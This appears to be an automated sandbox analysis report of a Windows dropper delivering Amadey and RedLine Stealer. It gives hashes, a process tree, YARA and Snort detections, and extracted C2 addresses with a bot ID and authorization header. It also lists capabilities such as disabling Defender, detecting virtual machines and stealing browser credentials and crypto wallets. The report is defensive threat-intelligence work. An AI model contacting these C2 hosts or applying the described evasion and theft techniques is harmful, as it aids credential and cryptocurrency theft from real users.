Windows Analysis Report
21fvBVFMsn.exe

Overview

General Information

Sample Name: 21fvBVFMsn.exe
Original Sample Name: 478e1c903cfcda85acdb9759ae80e155.exe
Analysis ID: 811560
MD5: 478e1c903cfcda85acdb9759ae80e155
SHA1: dc03499087dfa49b93fd9ba4b1452d0af8baef46
SHA256: fd0f2580ee525c2fbde7b187b7b385a56e1817a219da7f3c398992a2c784a7d1
Tags: Amadey, exe
Infos:

Detection

Amadey, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Disable Windows Defender real time protection (registry)
Tries to steal Crypto Currency Wallets
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • 21fvBVFMsn.exe (PID: 3460 cmdline: C:\Users\user\Desktop\21fvBVFMsn.exe MD5: 478E1C903CFCDA85ACDB9759AE80E155)
    • sEm51bM.exe (PID: 3236 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe MD5: EE9CEC71CDD89A723F90D5013E963B02)
      • sMt14vz.exe (PID: 6120 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe MD5: EA0FADAB5F038CDB93F37EA867C62934)
        • ijx54ck.exe (PID: 6108 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
        • kxL91dA.exe (PID: 3228 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe MD5: C9C03EC2426C8416841FD7E93BB9DC3D)
  • rundll32.exe (PID: 5388 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5188 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 4340 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about 500$ on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

{"C2 url": "193.233.20.15/dF30Hn4m/index.php", "Version": "3.67"}
{"C2 url": "193.233.20.17:4139", "Bot Id": "furka", "Authorization Header": "46dae41be0c00464bf56eddcc93e1bec"}

Source: dump.pcap, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: dump.pcap, Rule: JoeSecurity_RedLine_1, Description: Yara detected RedLine Stealer, Author: Joe Security

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe, Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Author: ditekSHen, Strings:
  • 0x1a440:$pat14: , CommandLine:
  • 0x134a9:$v2_1: ListOfProcesses
  • 0x13288:$v4_3: base64str
  • 0x13e01:$v4_4: stringKey
  • 0x11b63:$v4_5: BytesToStringConverted
  • 0x10d76:$v4_6: FromBase64
  • 0x12098:$v4_8: procName
  • 0x1281b:$v5_5: FileScanning
  • 0x11d6c:$v5_7: RecordHeaderField
  • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT

Source: 00000005.00000000.267575199.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: 00000000.00000003.241227286.0000000004A02000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Author: Joe Security
Source: Process Memory Space: kxL91dA.exe PID: 3228, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security

Source: 0.3.21fvBVFMsn.exe.4a8da20.0.unpack, Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Author: Joe Security
Source: 2.3.sMt14vz.exe.49fac20.0.raw.unpack, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: 2.3.sMt14vz.exe.49fac20.0.raw.unpack, Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Author: ditekSHen, Strings:
  • 0x1a440:$pat14: , CommandLine:
  • 0x134a9:$v2_1: ListOfProcesses
  • 0x13288:$v4_3: base64str
  • 0x13e01:$v4_4: stringKey
  • 0x11b63:$v4_5: BytesToStringConverted
  • 0x10d76:$v4_6: FromBase64
  • 0x12098:$v4_8: procName
  • 0x1281b:$v5_5: FileScanning
  • 0x11d6c:$v5_7: RecordHeaderField
  • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
Source: 5.0.kxL91dA.exe.4e0000.0.unpack, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: 5.0.kxL91dA.exe.4e0000.0.unpack, Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Author: ditekSHen, Strings:
  • 0x1a440:$pat14: , CommandLine:
  • 0x134a9:$v2_1: ListOfProcesses
  • 0x13288:$v4_3: base64str
  • 0x13e01:$v4_4: stringKey
  • 0x11b63:$v4_5: BytesToStringConverted
  • 0x10d76:$v4_6: FromBase64
  • 0x12098:$v4_8: procName
  • 0x1281b:$v5_5: FileScanning
  • 0x11d6c:$v5_7: RecordHeaderField
  • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT

No Sigma rule has matched

Timestamp: 02/19/23-02:32:23.476854
Source IP: 193.233.20.17
Destination IP: 192.168.2.3
SID: 2043234
Source Port: 4139
Destination Port: 49699
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 02/19/23-02:32:35.640007
Source IP: 192.168.2.3
Destination IP: 193.233.20.17
SID: 2043231
Source Port: 49699
Destination Port: 4139
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 02/19/23-02:32:22.070574
Source IP: 192.168.2.3
Destination IP: 193.233.20.17
SID: 2043233
Source Port: 49699
Destination Port: 4139
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: 21fvBVFMsn.exe, ReversingLabs: Detection: 76%
Source: 21fvBVFMsn.exe, Virustotal: Detection: 55%
Source: 21fvBVFMsn.exe, Avira: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe, Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe, Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe, ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe, Virustotal: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe, ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe, Virustotal: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exe, ReversingLabs: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exe, Virustotal: Detection: 40%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe, ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe, ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, ReversingLabs: Detection: 96%
Source: 21fvBVFMsn.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, Joe Sandbox ML: detected
Source: 1.3.sEm51bM.exe.4756820.0.unpack, Avira: Label: TR/Patched.Gen
Source: 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: RedLine {"C2 url": "193.233.20.17:4139", "Bot Id": "furka", "Authorization Header": "46dae41be0c00464bf56eddcc93e1bec"}
Source: 0.3.21fvBVFMsn.exe.4a8da20.0.unpack, Malware Configuration Extractor: Amadey {"C2 url": "193.233.20.15/dF30Hn4m/index.php", "Version": "3.67"}
Source: C:\Users\user\Desktop\21fvBVFMsn.exe, Code function: 0_2_00A42F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00A42F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe, Code function: 1_2_00322F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00322F1D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe, Code function: 2_2_010D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_010D2F1D
Source: 21fvBVFMsn.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 21fvBVFMsn.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: 0C:\nusegilo zawufeha_koboxuyokefamo\doneni.pdb source: sEm51bM.exe, 00000001.00000003.242054317.0000000004724000.00000004.00000020.00020000.00000000.sdmp, lbt58JR.exe.1.dr
Source: Binary string: wextract.pdb source: 21fvBVFMsn.exe, sEm51bM.exe.0.dr, sMt14vz.exe.1.dr
Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 21fvBVFMsn.exe, 00000000.00000003.241383449.0000000002ED4000.00000004.00000020.00020000.00000000.sdmp, 21fvBVFMsn.exe, 00000000.00000003.241227286.0000000004A02000.00000004.00000020.00020000.00000000.sdmp, nIp99Jf.exe.0.dr
Source: Binary string: wextract.pdbGCTL source: 21fvBVFMsn.exe, sEm51bM.exe.0.dr, sMt14vz.exe.1.dr
Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: sMt14vz.exe, 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, ijx54ck.exe, 00000003.00000000.242765935.00000000006E2000.00000002.00000001.01000000.00000006.sdmp, ijx54ck.exe.2.dr
Source: Binary string: C:\nusegilo zawufeha_koboxuyokefamo\doneni.pdb source: sEm51bM.exe, 00000001.00000003.242054317.0000000004724000.00000004.00000020.00020000.00000000.sdmp, lbt58JR.exe.1.dr
Source: C:\Users\user\Desktop\21fvBVFMsn.exe, Code function: 0_2_00A42390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00A42390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe, Code function: 1_2_00322390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00322390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe, Code function: 2_2_010D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_010D2390

Networking

Source: Traffic, Snort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49699 -> 193.233.20.17:4139
Source: Traffic, Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49699 -> 193.233.20.17:4139
Source: Traffic, Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.17:4139 -> 192.168.2.3:49699
Source: Malware configuration extractor, URLs: 193.233.20.15/dF30Hn4m/index.php
Source: Malware configuration extractor, URLs: 193.233.20.17:4139
Source: Joe Sandbox View, ASN Name: REDCOM-ASRedcomKhabarovskRussiaRU
Source: Joe Sandbox View, IP Address: 193.233.20.17
Source: global traffic, TCP traffic: 192.168.2.3:49699 -> 193.233.20.17:4139
Source: unknown, TCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response0
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
